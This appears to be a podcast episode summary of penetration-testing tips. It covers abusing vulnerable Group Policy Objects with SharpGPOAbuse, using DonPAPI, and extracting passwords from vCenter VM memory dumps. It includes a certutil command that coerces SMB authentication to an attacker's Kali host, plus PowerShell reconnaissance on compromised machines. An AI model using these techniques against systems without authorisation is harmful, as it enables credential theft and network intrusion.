7MS #632: Tales of Pentest Pwnage – Part 59

Today's tale of pentest pwnage includes some fun stuff, including: SharpGPOAbuse helps abuse vulnerable GPOs!  Try submitting a harmless POC first via a scheduled task – like ping -n 1 your.kali.ip.address.  When you're ready to fire off a task that coerces SMB auth, try certutil -syncwithWU \\your.kali.ip.address\arbitrary-folder. I'm not 100% sure on this, but I think scheduled tasks capture Kerberos tickets temporarily to workstation(s).  If you're on a compromised machine, try Get-ScheduledTask -taskname "name" | select * to get information about what context the attack is running under. DonPAPI got an upgrade recently with a focus on evasion! When attacking vCenter (see our past YouTube stream for a walkthrough), make sure you've got the vmss2core utility, which I couldn't find anywhere except the Internet Archive.  Then I really like to follow this article to pull passwords from VM memory dumps. Can't RDP into a victim system that you're PSRemote'd into?  Maybe RDP is listening on an alternate port!  Try Get-ItemProperty -path "HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp | select-object portnumber` And if you want to hang around until the very end, you can hear me brag about my oldest son who just became an EMT!

There are no comments yet.

Please log in to write the first comment.